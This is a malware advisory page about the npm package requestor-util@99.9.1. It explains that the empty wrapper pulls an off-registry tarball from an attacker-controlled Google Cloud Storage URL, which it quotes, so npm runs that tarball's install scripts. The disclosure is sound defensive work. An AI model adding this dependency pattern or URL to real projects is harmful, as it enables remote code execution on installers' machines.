VDB
KO

MAL-2026-10965

Malicious code in requestor-util (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (d8a60f357ab63e9818e450e4e4aec3dcf1b08d1242931ad5ad8468a460ee82ba) requestor-util@99.9.1 is a hollow wrapper (empty index.js, placeholder 99.9.1 version) whose only effect on install is to resolve a dependency declared as a direct tarball URL: "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.4.6.tgz". npm install fetches whatever bytes currently live at that mutable Google Cloud Storage URL and executes any preinstall/install/postinstall lifecycle scripts contained in that tarball on the installer's machine. The URL is not on the npm registry (bypassing registry-side scanning) and is controlled by whoever owns the GCS bucket, who can swap the payload at any time without republishing the wrapper. The hollow-main + off-registry-tarball-dependency shape matches the dropper-lure pattern: the wrapper's function is to force resolution of an attacker-mutable external artifact into every installer's dependency tree.

## Source: ossf-package-analysis (6d4229671aa9a57f0ffbe61cd9ebe925c0874f55dd72d15f43adff096d0cf3f0) The OpenSSF Package Analysis project identified 'requestor-util' @ 99.9.1 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / requestor-util

No fixed version published yet for requestor-util (npm). Pin to a known-safe version or switch to an alternative.

References